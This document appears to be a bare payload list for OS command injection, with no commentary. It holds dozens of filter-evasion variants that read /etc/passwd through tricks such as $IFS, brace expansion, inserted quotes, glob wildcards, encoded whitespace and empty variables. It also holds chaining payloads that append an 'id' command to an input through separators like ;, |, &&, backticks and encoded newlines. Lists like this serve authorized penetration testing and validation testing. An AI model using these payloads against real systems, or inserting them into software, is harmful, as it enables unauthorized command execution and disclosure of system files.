cat${IFS}/etc/passwd
cat$IFS/etc/passwd
{cat,/etc/passwd}
cat</etc/passwd
cat%09/etc/passwd
cat%0a/etc/passwd
cat%20/etc/passwd
X=$'cat\x20/etc/passwd'&&$X
c'a't /etc/passwd
c"a"t /etc/passwd
c\at /etc/passwd
/???/c?t /???/p?sswd
/???/c?t /???/p??s??
/???/c*t /???/p*d
c${invalid_var}at /etc/passwd
cat /e${invalid}tc/passwd
cat /et$()c/passwd
cat$u /etc$u/passwd
c\a\t /etc/passwd
c''a''t /etc/passwd
c""a""t /etc/passwd
cat /etc/pass'w'd
ca$@t /etc/passwd
echo$IFS'id'|$0
$({cat,/etc/passwd})
$(cat${IFS}/etc/passwd)
`cat /etc/passwd`
a]];id;[[
a]];id
a;id
a|id
a`id`
a$(id)
a&id
a&&id
a||id
a\nid
a%0aid
